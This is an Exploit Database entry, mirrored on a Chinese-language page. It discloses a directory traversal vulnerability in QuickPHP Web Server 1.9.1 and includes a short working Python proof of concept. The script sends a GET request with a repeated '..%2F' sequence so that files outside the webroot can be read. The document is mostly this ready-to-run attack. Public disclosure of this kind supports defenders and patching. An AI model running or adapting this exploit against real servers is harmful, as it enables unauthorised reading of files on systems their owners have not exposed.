QuickPHP Web Server 1.9.1 – Directory Traversal

• Exploit Database
• 117 阅读

• 作者： John Leitch
  日期： 2010-12-29
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15862/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54

  # ------------------------------------------------------------------------   # Software................QuickPHP Web Server 1.9.1   # Vulnerability...........Directory Traversal   # Download................http://www.zachsaw.co.cc/?pg=quickphp_php_tester_debugger   # Release Date............12/27/2010   # Tested On...............Windows XP   # ------------------------------------------------------------------------   # Author..................John Leitch   # Site....................http://www.johnleitch.net/   # Email...................john.leitch5@gmail.com   # ------------------------------------------------------------------------   #   # --Description-- # # A directory traversal vulnerability in QuickPHP Web Server 1.9.1 can # be exploited to read files outside of the webroot directory. # # # --Exploit-- # # The resource path must be absolute. # # ..%2F # # # --PoC--       import socket   host = 'localhost' port = 80   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(8) s.connect((host, port)) s.send('GET http://' + host + '/' + '..%2F' * 8 + ' HTTP/1.1\r\n' 'Host: ' + host + '\r\n\r\n');   print s.recv(8192);